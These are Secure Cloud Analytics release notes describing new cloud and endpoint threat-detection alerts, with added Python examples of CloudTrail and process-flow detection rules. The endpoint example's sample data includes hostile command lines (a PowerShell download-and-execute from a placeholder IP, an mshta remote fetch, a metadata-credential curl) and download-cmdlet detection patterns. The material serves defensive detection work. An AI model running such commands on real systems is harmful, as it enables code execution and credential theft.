Previous Release Notes for Secure Cloud Analytics
-
Attack Chains framework update: Attack chains have been enhanced and are now fully merged with Cisco XDR incidents. Incidents created from attack chains prior to the Cisco XDR release 2.29 will remain open until manually closed, but the attack chains will no longer receive updates. Use the Incidents page in your Cisco XDR portal to investigate any attack chains in the future.
-
Cisco Meraki telemetry: You can now view telemetry from the Cisco XDR and Meraki integration in Secure Cloud Analytics. For details, see the Cisco Meraki Integration topic.
-
AWS Anomalous IAM Role Policy Update Alert: This new alert indicates an update was made to an existing Identity and Access Management (IAM) role's AssumeRole (trust) policy, and this behavior is unusual in this AWS account. Because the trust policy decides which identities may assume the role, adding an attacker-controlled principal to it is a known way to establish persistence. This alert requires AWS CloudTrail Logs and is disabled by default.
-
AWS CloudTrail Statistics Anomaly Observation: This new observation indicates an anomaly was detected based on the AWS CloudTrail events statistics. This observation requires AWS CloudTrail Logs.
-
AWS Console Login without MFA Alert: This new alert indicates a user logged in to the AWS Management Console without Multi-Factor Authentication (MFA). This alert requires AWS CloudTrail Logs and is disabled by default.
-
AWS EC2 Multiple SSH Keys Upload Anomaly Alert: This new alert indicates multiple SSH keys were uploaded to EC2 instances within a short period, which can indicate an attacker establishing a persistence mechanism. This alert requires AWS CloudTrail Logs and is disabled by default.
-
AWS GuardDuty Trusted IP List Created Alert: This new alert indicates a GuardDuty trusted IP list (IPSet) was created. GuardDuty does not generate findings for IP addresses on a trusted list, so the feature, while legitimate for allow-listing known infrastructure, has also been used by threat actors as a Defense Evasion technique. This alert requires AWS CloudTrail Logs and is disabled by default.
-
AWS Lambda Backdoor Through Resource-Based Policy Alert: This new alert indicates adversaries may be maintaining persistence in a victim environment by manipulating permissions on a cloud resource. Granting invoke permission on a Lambda function to an external identity lets that identity keep a foothold in the environment. This alert requires AWS CloudTrail Logs and is disabled by default.
-
AWS Lambda Layer from External Account Added Alert: This new alert indicates a Lambda layer owned by an external AWS account was added to an AWS Lambda function. Lambda layers are a legitimate feature for adding dependencies needed by the primary function code. Threat actors have been known to misuse this capability for Persistence or Execution, especially when the layer comes from an untrusted external account. This alert requires AWS CloudTrail Logs and is disabled by default.
-
AWS S3Browser Create Login Profile Alert: This new alert indicates the third party utility S3Browser was used to create a login profile on an existing IAM user. This utility, while legitimate in nature, has been used in numerous threat actor campaigns. This alert requires AWS CloudTrail Logs and is disabled by default.
-
AWS Session Manager Multiple Instances Utilized Alert: This new alert indicates AWS Systems Manager Session Manager was used to execute commands on multiple Elastic Compute Cloud instances simultaneously. Session Manager is a legitimate administrative tool, but has been utilized for Lateral Movement, Execution and Persistence by threat actors including Advanced Persistent Threats. This alert requires AWS CloudTrail Logs and is disabled by default.
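The CloudTrail-driven alerts above (Console Login without MFA, the IAM role trust policy update, the Lambda resource-based policy backdoor and the external Lambda layer) each key on specific fields of a CloudTrail record. The following Python is an added example, not Secure Cloud Analytics code: it shows stateless checks a practitioner could run over exported CloudTrail events. The account ids, sample events and the alert labels in RULES are constructed for the example, and the trust-policy check inspects the principals in the new policy document rather than modelling the per-account baseline that the product's anomaly alert uses.

```python
"""Stateless CloudTrail checks modelled on four of the AWS alerts above.

Added example, not Secure Cloud Analytics code. Event shapes follow the
CloudTrail record format; the account ids and sample events are constructed.
"""
import json
import re
from urllib.parse import quote, unquote

OWN = "111111111111"  # constructed: the monitored account id
ACCOUNT_ID = re.compile(r"\b(\d{12})\b")
LAYER_ARN = re.compile(r"^arn:aws:lambda:[a-z0-9-]+:(\d{12}):layer:")


def console_login_without_mfa(ev: dict) -> bool:
    """Successful ConsoleLogin by an IAM user or root that reports MFAUsed = No."""
    # Federated sessions (userIdentity.type AssumedRole) do MFA at the IdP, which
    # the ConsoleLogin record does not reflect, so they are deliberately excluded.
    return (ev.get("eventSource") == "signin.amazonaws.com"
            and ev.get("eventName") == "ConsoleLogin"
            and (ev.get("userIdentity") or {}).get("type") in ("IAMUser", "Root")
            and (ev.get("responseElements") or {}).get("ConsoleLogin") == "Success"
            and (ev.get("additionalEventData") or {}).get("MFAUsed") == "No")


def foreign_account(principal: str, own: str) -> bool:
    """True if a policy principal names another account or everyone ('*')."""
    if principal == "*":
        return True
    if principal.endswith(".amazonaws.com"):  # AWS service principal, not an account
        return False
    m = ACCOUNT_ID.search(principal)
    return m is not None and m.group(1) != own


def lambda_external_invoke_permission(ev: dict) -> bool:
    """AddPermission granting lambda:InvokeFunction to a principal outside the account."""
    params = ev.get("requestParameters") or {}
    return (ev.get("eventSource") == "lambda.amazonaws.com"
            and ev.get("eventName", "").startswith("AddPermission")  # CloudTrail appends an API version
            and not ev.get("errorCode")
            and params.get("action") == "lambda:InvokeFunction"
            and foreign_account(str(params.get("principal", "")), ev.get("recipientAccountId", "")))


def lambda_layers_from_external_account(ev: dict) -> list:
    """Layer ARNs attached by UpdateFunctionConfiguration that another account owns."""
    if (ev.get("eventSource") != "lambda.amazonaws.com"
            or not ev.get("eventName", "").startswith("UpdateFunctionConfiguration")):
        return []
    own = ev.get("recipientAccountId", "")
    layers = (ev.get("requestParameters") or {}).get("layers") or []
    return [arn for arn in layers if (m := LAYER_ARN.match(arn)) and m.group(1) != own]


def trust_policy_external_principals(ev: dict) -> list:
    """Principals outside the account that an UpdateAssumeRolePolicy call lets assume the role."""
    if ev.get("eventSource") != "iam.amazonaws.com" or ev.get("eventName") != "UpdateAssumeRolePolicy":
        return []
    own = ev.get("recipientAccountId", "")
    # CloudTrail stores requestParameters.policyDocument URL-encoded.
    doc = json.loads(unquote((ev.get("requestParameters") or {}).get("policyDocument", "{}")))
    stmts = doc.get("Statement", [])
    found = []
    for st in [stmts] if isinstance(stmts, dict) else stmts:
        if st.get("Effect") != "Allow":
            continue
        principal = st.get("Principal", {})
        aws = principal.get("AWS", []) if isinstance(principal, dict) else principal
        found.extend(p for p in ([aws] if isinstance(aws, str) else aws) if foreign_account(p, own))
    return found


RULES = [  # constructed labels; the last one is not a product alert name
    ("AWS Console Login without MFA", console_login_without_mfa),
    ("AWS Lambda Backdoor Through Resource-Based Policy", lambda_external_invoke_permission),
    ("AWS Lambda Layer from External Account Added", lambda_layers_from_external_account),
    ("IAM role trust policy opened to an external account", trust_policy_external_principals),
]


def run_rules(events: list) -> list:
    """(alert name, eventID) for every rule that fires on every event, in input order."""
    return [(name, ev["eventID"]) for ev in events for name, rule in RULES if rule(ev)]


# Constructed sample events (not real CloudTrail data).
TRUST_POLICY = {"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "sts:AssumeRole",
                                                       "Principal": {"AWS": "arn:aws:iam::999999999999:root"}}]}
SAMPLE_EVENTS = [
    {"eventID": "e1", "eventSource": "signin.amazonaws.com", "eventName": "ConsoleLogin", "recipientAccountId": OWN,
     "userIdentity": {"type": "IAMUser", "userName": "alice"}, "responseElements": {"ConsoleLogin": "Success"},
     "additionalEventData": {"MFAUsed": "No"}},
    {"eventID": "e2", "eventSource": "lambda.amazonaws.com", "eventName": "AddPermission20150331v2",
     "recipientAccountId": OWN, "requestParameters": {"functionName": "billing-export", "statementId": "s1",
     "action": "lambda:InvokeFunction", "principal": "arn:aws:iam::999999999999:root"}},
    {"eventID": "e3", "eventSource": "lambda.amazonaws.com", "eventName": "UpdateFunctionConfiguration20150331v2",
     "recipientAccountId": OWN, "requestParameters": {"functionName": "billing-export", "layers": [
     f"arn:aws:lambda:us-east-1:{OWN}:layer:common-libs:3", "arn:aws:lambda:us-east-1:999999999999:layer:helper:1"]}},
    {"eventID": "e4", "eventSource": "iam.amazonaws.com", "eventName": "UpdateAssumeRolePolicy",
     "recipientAccountId": OWN, "requestParameters": {"roleName": "deploy", "policyDocument": quote(json.dumps(TRUST_POLICY))}},
]
```

Running `run_rules(SAMPLE_EVENTS)` fires one rule per sample event. Before turning checks like these into alerts, put known-good external principals and layers on an allow-list (AWS itself publishes Lambda layers from AWS-owned accounts), and keep the MFA check restricted to IAM users and root: MFA for federated console sessions is enforced at the identity provider and the ConsoleLogin record does not reflect it.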
-
Content Download Using Powershell Alert: This new alert indicates that Powershell was observed to download content. It is common for adversaries to leverage various cmdlets in order to fetch and execute their payloads from remote locations. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.
-
Executions of File from Recycle Bin Alert: This new alert indicates adversaries may be leveraging the Recycle Bin to evade detection during the execution stage of their attacks. Several malware families have been observed using this technique in the wild. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.
-
Potential Enterprise Chat Command and Control Alert: This new alert indicates adversaries may be leveraging enterprise chat applications to perform their command and control communications. This may be done in an attempt to evade detection. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.
-
Suspicious File Download Observed on Process Arguments Alert: This new alert indicates a URL pattern for a file download was observed on a process command line. This activity has features that may be indicative of malicious payload delivery. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.
-
AWS Anomalous RDS Password Reset Alert: This new alert indicates the master user password for a Relational Database Service instance was changed. This alert requires AWS CloudTrail Logs and is disabled by default.
-
AWS Anomalous Secrets Manager Batch Retrieval Alert: This new alert indicates a batch retrieval of many secrets was made to AWS Secrets Manager by a principal that does not normally perform this action. This alert requires AWS CloudTrail Logs and is disabled by default.
-
Connection to TOR IP Address Alert: This new alert indicates traffic to an IP address belonging to The Onion Router (TOR) network was detected. TOR has legitimate privacy-preserving uses on a personal device, but adversaries are known to leverage it for Command and Control traffic and defense evasion. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.
-
Endpoint Exfiltration of AWS Credentials Alert: This new alert indicates AWS credentials were accessed by a process that made a network connection. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.
-
GCP API Call Using TOR IP Alert: This new alert indicates a GCP API call was made using an IP address believed to be a TOR Exit Node. This alert requires GCP Audit Logs and is disabled by default.
-
LDAP Connection from Suspicious Process Alert: This existing alert has been renamed to LDAP Connection from Anomalous Process. This alert has also been improved to be more accurate.
-
MFA Disabled for Azure Alert: This new alert indicates Multi-Factor Authentication (MFA) has been disabled for a user in a Microsoft Azure environment. This alert requires Azure Audit Logs and is disabled by default.
-
Powershell RDP Connection Alert: This new alert indicates the system utility PowerShell was seen making connections to the RDP port (TCP 3389 by default), which indicates PowerShell is being used to reach other systems over RDP. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.
-
Powershell WinRM Connection Alert: This new alert indicates the system utility PowerShell was seen making connections to the Windows Remote Management (WinRM) ports (TCP 5985 for HTTP and 5986 for HTTPS by default), which indicates remote management sessions being initiated from PowerShell. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.
-
SMB traffic initiated from a command interpreter Alert: This new alert indicates detection of SMB traffic where the parent process is cmd, PowerShell, or Python (not executed by a system account) and where a significantly larger amount of data is sent than received. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.
-
Suspicious File Download Observed on Process Arguments Alert: This new alert indicates a URL pattern indicating a file download was observed on a process command line. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.
-
Suspicious MSHTA Activity Alert: This new alert indicates the built-in Windows application MSHTA.exe was executed interactively by a non-system user and utilized to make a network connection. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.
-
Crowdstrike integration enhancement: We now receive domain name and URL indicator of compromise data from Crowdstrike. To view this data in the Secure Cloud Analytics web portal, go to Monitor > Alerts and select an alert from Crowdstrike. In the Supporting Observations section, click the Expand icon to open the detailed data that includes domain names and URLs.
-
Suspicious Curl Request to Telegram Alert: This existing alert has been renamed to Suspicious Request to Telegram. This alert is also now supported on macOS.
-
AWS Organization Exit Attempt Alert: This new alert indicates an attempt was made by a child account to leave an AWS Organization. Threat actors can perform this technique to impair defenses or monitoring. This alert requires AWS CloudTrail logs and is disabled by default.
-
Cloud Metadata Service Credential Access Alert: This new alert indicates a request for credentials was made to one of the public cloud Instance Metadata Service endpoints (the link-local address 169.254.169.254 on AWS, Azure and GCP). This alert requires Network Visibility Module (NVM) data and is disabled by default.
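Several of the NVM-based alerts above (Powershell RDP Connection, Powershell WinRM Connection, SMB traffic initiated from a command interpreter, Suspicious MSHTA Activity, Content Download Using Powershell, Suspicious File Download Observed on Process Arguments and Cloud Metadata Service Credential Access) reduce to conditions on process name, parent process, user, command line, destination and byte counts. The following Python is an added example, not Secure Cloud Analytics code: the flat record schema is a constructed, simplified stand-in for NVM flow data, and the byte-ratio threshold, the sample records and the approximation of "interactive" by "non-system user" are assumptions made for the example.

```python
"""Endpoint flow and process checks modelled on the NVM-based alerts above.

Added example, not Secure Cloud Analytics code. The flat record schema
(process, parent, user, cmdline, dst_ip, dst_port, sent, recv) is a constructed
stand-in for NVM flow data; thresholds and sample records are assumed.
"""
import re

SYSTEM_USERS = {"nt authority\\system", "nt authority\\local service", "nt authority\\network service"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "python.exe"}
SMB_SEND_RATIO = 10  # assumed: bytes sent must exceed bytes received by this factor
IMDS_ADDRESS = "169.254.169.254"  # link-local metadata address on AWS, Azure and GCP
CREDENTIAL_PATHS = ("/latest/meta-data/iam/security-credentials",     # AWS IMDS
                    "/metadata/identity/oauth2/token",                # Azure managed identity
                    "/computeMetadata/v1/instance/service-accounts")  # GCP
PS_DOWNLOAD = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|"
                         r"start-bitstransfer|invoke-expression|\biex\b", re.I)
FILE_URL = re.compile(r"https?://\S+?\.(?:exe|dll|ps1|hta|msi|zip|js|vbs|bat)\b", re.I)


def is_system(user: str) -> bool:
    return user.lower() in SYSTEM_USERS


def powershell_rdp(r: dict) -> bool:
    return r["process"] == "powershell.exe" and r["dst_port"] == 3389


def powershell_winrm(r: dict) -> bool:
    return r["process"] == "powershell.exe" and r["dst_port"] in (5985, 5986)


def smb_from_interpreter(r: dict) -> bool:
    """SMB flow (445) whose parent is an interpreter, under a non-system user, mostly outbound."""
    return (r["dst_port"] == 445 and r["parent"] in INTERPRETERS and not is_system(r["user"])
            and r["sent"] > SMB_SEND_RATIO * max(r["recv"], 1))


def mshta_network(r: dict) -> bool:
    """mshta.exe with a network flow as a non-system user (stands in for 'interactive')."""
    return r["process"] == "mshta.exe" and not is_system(r["user"])


def imds_credential_access(r: dict) -> bool:
    """Flow to the metadata address from a command line that names a credential path."""
    return r["dst_ip"] == IMDS_ADDRESS and any(p in r["cmdline"] for p in CREDENTIAL_PATHS)


def powershell_download(r: dict) -> bool:
    return r["process"] in ("powershell.exe", "pwsh.exe") and PS_DOWNLOAD.search(r["cmdline"]) is not None


def file_url_in_args(r: dict) -> bool:
    return FILE_URL.search(r["cmdline"]) is not None


RULES = [
    ("Powershell RDP Connection", powershell_rdp),
    ("Powershell WinRM Connection", powershell_winrm),
    ("SMB traffic initiated from a command interpreter", smb_from_interpreter),
    ("Suspicious MSHTA Activity", mshta_network),
    ("Cloud Metadata Service Credential Access", imds_credential_access),
    ("Content Download Using Powershell", powershell_download),
    ("Suspicious File Download Observed on Process Arguments", file_url_in_args),
]


def run_rules(records: list) -> list:
    """(alert name, record id) for every rule that fires on every record, in input order."""
    return [(name, r["id"]) for r in records for name, rule in RULES if rule(r)]


def rec(rid, process, parent, user, cmdline, dst_ip, dst_port, sent=0, recv=0) -> dict:
    return dict(id=rid, process=process, parent=parent, user=user, cmdline=cmdline,
                dst_ip=dst_ip, dst_port=dst_port, sent=sent, recv=recv)


SAMPLE = [  # constructed records, not real NVM data
    rec("r1", "powershell.exe", "explorer.exe", "CORP\\alice", "powershell.exe", "10.0.0.5", 3389, 4096, 8192),
    rec("r2", "powershell.exe", "explorer.exe", "CORP\\alice", "powershell.exe", "10.0.0.6", 5985, 4096, 8192),
    rec("r3", "robocopy.exe", "cmd.exe", "CORP\\alice", "robocopy C:\\Finance \\\\10.0.0.9\\share /E",
        "10.0.0.9", 445, 52_000_000, 120_000),
    rec("r4", "mshta.exe", "explorer.exe", "CORP\\alice", "mshta.exe http://198.51.100.7/x.hta",
        "198.51.100.7", 80, 512, 30_000),
    rec("r5", "curl.exe", "cmd.exe", "CORP\\svc-build",
        "curl http://169.254.169.254/latest/meta-data/iam/security-credentials/", "169.254.169.254", 80, 200, 900),
    rec("r6", "powershell.exe", "winword.exe", "CORP\\bob",
        "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')\"",
        "198.51.100.7", 80, 300, 12_000),
    rec("r7", "robocopy.exe", "cmd.exe", "NT AUTHORITY\\SYSTEM", "robocopy D:\\backup \\\\10.0.0.9\\backup /E",
        "10.0.0.9", 445, 900_000_000, 50_000),
]
```

`run_rules(SAMPLE)` fires on r1 through r6 and stays silent on r7, the scheduled backup running as SYSTEM, which is the point of the user check in the SMB rule. Byte ratios and port numbers are cheap to evaluate but easy to evade (an attacker can pick a non-default RDP port), so treat these as triage signals that need the command line and parent process to confirm.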
-
DC Sync Attack Behavior Alert: This new alert indicates suspicious behaviors were detected on the endpoint that are known to be part of the DC Sync attack. This alert requires NVM data.
-
Secure Network Analytics alarm data update: Secure Network Analytics 7.4.2 and 7.5.0 alarm data is used in Endpoint Detection and Response correlated attack chains, which can now be promoted to Cisco XDR as incidents using a webhook through Response Management. For more information, see the Alarm Configuration for Cisco XDR Guide 7.4.2 and Alarm Configuration for Cisco XDR Guide 7.5.0.
-
Cisco Secure Endpoint update: Cloud IOC engine is now a data source for detections in Cisco XDR. Currently, only high and critical events are sent.
-
AWS Anomalous IAM Role Policy Update Alert: This new alert indicates there was an update to an existing Identity and Access Management (IAM) role's AssumeRole policy, and this behavior is unusual in this AWS account. This alert is disabled by default.
-
Suspicious Network Findings by Collection Alert: This new alert indicates suspicious behaviors were detected on the network that are mapped to the Collection MITRE tactic. This alert requires a Network detection and response (NDR) integration.
-
Suspicious Network Findings by Command and Control Alert: This new alert indicates suspicious behaviors were detected on the network that are mapped to the Command and Control MITRE tactic. This alert requires an NDR integration.
-
Suspicious Network Findings by Exfiltration Alert: This new alert indicates suspicious behaviors were detected on the network that are mapped to the Exfiltration MITRE tactic. This alert requires an NDR integration.
-
Suspicious Network Security Finding Observation: This new observation indicates suspicious behavior reported on the network. This observation requires an NDR integration.
-
Potential Persistence Attempt Alert: This alert has been removed based on an efficacy review. This alert was designed to indicate a device was detected applying known persistence mechanisms like establishing background processes used for network access or running applications from network shares.
-
Secure Email Threat Defense update: Malicious messages from the Secure Email Threat Defense integration are now correlated to EDR and network alerts by the recipient of the email message. You will now see the recipient username in Secure Cloud Analytics Event Viewer, and Cisco XDR will analyze messages and correlate events based on the extracted username of the recipient, allowing suspicious or malicious user activity to be correlated across domains. This excludes common system users, such as administrator, system, and root.
-
Anomalous Azure Custom Script Extensions Alert: This new alert indicates Azure Custom Script Extensions were utilized to execute commands on an Azure Virtual Machine, and this behavior was anomalous for the account it was detected in. While Custom Script Extensions are a legitimate feature of Azure, they have been utilized by threat actors including Advanced Persistent Threat groups in the past. This alert is disabled by default.
-
Malicious Process Detected Alert: This existing alert now supports macOS data from the Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM).
-
Azure Anomalous RunCommand Alert: This new alert indicates an Azure RunCommand was successfully utilized to remotely execute a command or commands on an Azure Virtual Machine, and this behavior was anomalous. Though potentially benign, adversaries (including Advanced Persistent Threats) are known to utilize this capability. This alert is disabled by default.
-
Amazon Web Services Integration: The AWS integration instructions in the Secure Cloud Analytics web portal have been updated to include the Add CloudTrail Logs to Secure Cloud Analytics section. The new S3 configuration will help to remediate the AWS API throttling experienced in large environments. New CloudTrail alerts in Secure Cloud Analytics will use the new S3 configuration. If you are using the API method, you will need to update your CloudTrail configuration. Go to Settings > Integrations > AWS > About to view the new instructions on how to set up the S3 configuration.
-
Event Viewer NVM Performance Enhancements: Event Viewer performance for NVM queries has been improved with faster page load time and faster query performance.
-
AWS High Volume of API GetPasswordData call failures Alert: This new alert indicates a high volume of AWS GetPasswordData calls were made and failed. This may indicate an attempt by a threat actor to obtain the administrator password for a running Windows instance.
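The GetPasswordData failure alert above and the AWS Anomalous Secrets Manager Batch Retrieval alert are counting problems rather than single-event matches: one looks for many failures from one principal in a short window, the other for a principal reading many secrets when it has no history of doing so. The following Python is an added example, not Secure Cloud Analytics code, implementing both with a per-principal sliding-window counter; the ten-minute window, the thresholds, the learned baseline and the sample events are constructed for the example.

```python
"""Sliding-window counts for the two CloudTrail alerts above.

Added example, not Secure Cloud Analytics code. The window, thresholds,
learned baseline and sample events are constructed; event fields follow the
CloudTrail record format.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)  # assumed
PASSWORD_FAIL_THRESHOLD = 20    # assumed: failed GetPasswordData calls per principal per window
SECRET_READ_THRESHOLD = 10      # assumed: secrets read per principal per window


class SlidingCounter:
    """Per-key count of event timestamps inside the trailing window."""

    def __init__(self, window: timedelta):
        self.window = window
        self.seen = defaultdict(deque)

    def add(self, key: str, ts: datetime, weight: int = 1) -> int:
        q = self.seen[key]
        q.extend([ts] * weight)
        while q and ts - q[0] > self.window:  # drop entries that fell out of the window
            q.popleft()
        return len(q)


def principal_of(ev: dict) -> str:
    ui = ev.get("userIdentity") or {}
    return ui.get("arn") or ui.get("principalId") or "unknown"


def detect(events: list, secrets_baseline: set) -> list:
    """(alert, principal) pairs, each fired at most once per principal.

    secrets_baseline: principals seen reading secrets during a learning period (assumed input).
    """
    pw_fail, secret_reads = SlidingCounter(WINDOW), SlidingCounter(WINDOW)
    alerts, fired = [], set()
    for ev in sorted(events, key=lambda e: e["eventTime"]):
        ts = datetime.strptime(ev["eventTime"], "%Y-%m-%dT%H:%M:%SZ")
        who, src, name = principal_of(ev), ev.get("eventSource"), ev.get("eventName")
        if src == "ec2.amazonaws.com" and name == "GetPasswordData" and ev.get("errorCode"):
            if pw_fail.add(who, ts) >= PASSWORD_FAIL_THRESHOLD and ("pw", who) not in fired:
                fired.add(("pw", who))
                alerts.append(("AWS High Volume of API GetPasswordData call failures", who))
        elif src == "secretsmanager.amazonaws.com" and name in ("GetSecretValue", "BatchGetSecretValue"):
            params = ev.get("requestParameters") or {}
            weight = len(params.get("secretIdList") or []) if name == "BatchGetSecretValue" else 1
            n = secret_reads.add(who, ts, max(weight, 1))
            if who not in secrets_baseline and n >= SECRET_READ_THRESHOLD and ("sm", who) not in fired:
                fired.add(("sm", who))
                alerts.append(("AWS Anomalous Secrets Manager Batch Retrieval", who))
    return alerts


# Constructed sample events (not real CloudTrail data).
def _ev(i: int, t: datetime, src: str, name: str, arn: str, **extra) -> dict:
    return {"eventID": f"e{i}", "eventTime": t.strftime("%Y-%m-%dT%H:%M:%SZ"), "eventSource": src,
            "eventName": name, "userIdentity": {"type": "IAMUser", "arn": arn}, **extra}


T0 = datetime(2024, 5, 1, 10, 0, 0)
SCANNER = "arn:aws:iam::111111111111:user/scanner"
CONTRACTOR = "arn:aws:iam::111111111111:user/contractor"
APP_ROLE = "arn:aws:sts::111111111111:assumed-role/app-server/i-0abc"
BASELINE = {APP_ROLE}  # assumed: app-server reads secrets routinely, contractor never has
SAMPLE_EVENTS = (
    [_ev(i, T0 + timedelta(seconds=10 * i), "ec2.amazonaws.com", "GetPasswordData", SCANNER,
         errorCode="Client.UnauthorizedOperation", requestParameters={"instanceId": f"i-{i:017x}"})
     for i in range(25)]
    + [_ev(100 + i, T0 + timedelta(minutes=5, seconds=5 * i), "secretsmanager.amazonaws.com", "GetSecretValue",
           CONTRACTOR, requestParameters={"secretId": f"prod/db/{i}"}) for i in range(8)]
    + [_ev(200, T0 + timedelta(minutes=6), "secretsmanager.amazonaws.com", "BatchGetSecretValue", CONTRACTOR,
           requestParameters={"secretIdList": ["prod/api/a", "prod/api/b", "prod/api/c"]})]
    + [_ev(300 + i, T0 + timedelta(minutes=7, seconds=5 * i), "secretsmanager.amazonaws.com", "GetSecretValue",
           APP_ROLE, requestParameters={"secretId": "prod/db/main"}) for i in range(15)]
)
```

`detect(SAMPLE_EVENTS, BASELINE)` returns one alert for the scanner user (the 20th failed GetPasswordData call, at 10:03:10) and one for the contractor (eight single reads plus a batch of three crosses the threshold at 10:06:00); the application role reads more secrets than either but is in the baseline and stays silent. Keying on the principal ARN rather than the access key id matters here, because an attacker rotating keys for the same user would otherwise split the count.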
-
Potential Gamaredon C2 callout Alert: This new alert indicates a command line utility was used to contact a URL associated with the command-and-control servers of a threat actor known as Gamaredon. Gamaredon (also known as Armageddon, Primitive Bear, and ACTINIUM) is an APT active since 2013 known to leverage spearphishing to infect victims with custom malware.
-
Potential GhostPulse Malware C2 Alert: This new alert indicates a device exhibited behavior similar to that of the GhostPulse malware family.
-
Suspicious Curl Request to Telegram Alert: This new alert indicates a suspicious attempt to communicate with the Telegram chat service or the Telegraph blog service using the curl command-line tool. Adversaries have been known to use Telegram in this manner for C2 communications.
-
Heartbeat Observation: This observation has been improved to detect suspicious activity from Azure infrastructure. Previously, Azure activity was considered trusted and excluded from Heartbeat observations.
Previous Release Notes on Cisco.com
To view the Release Notes for releases from February 2024 and earlier, see Release Notes for Secure Cloud Analytics published on Cisco.com.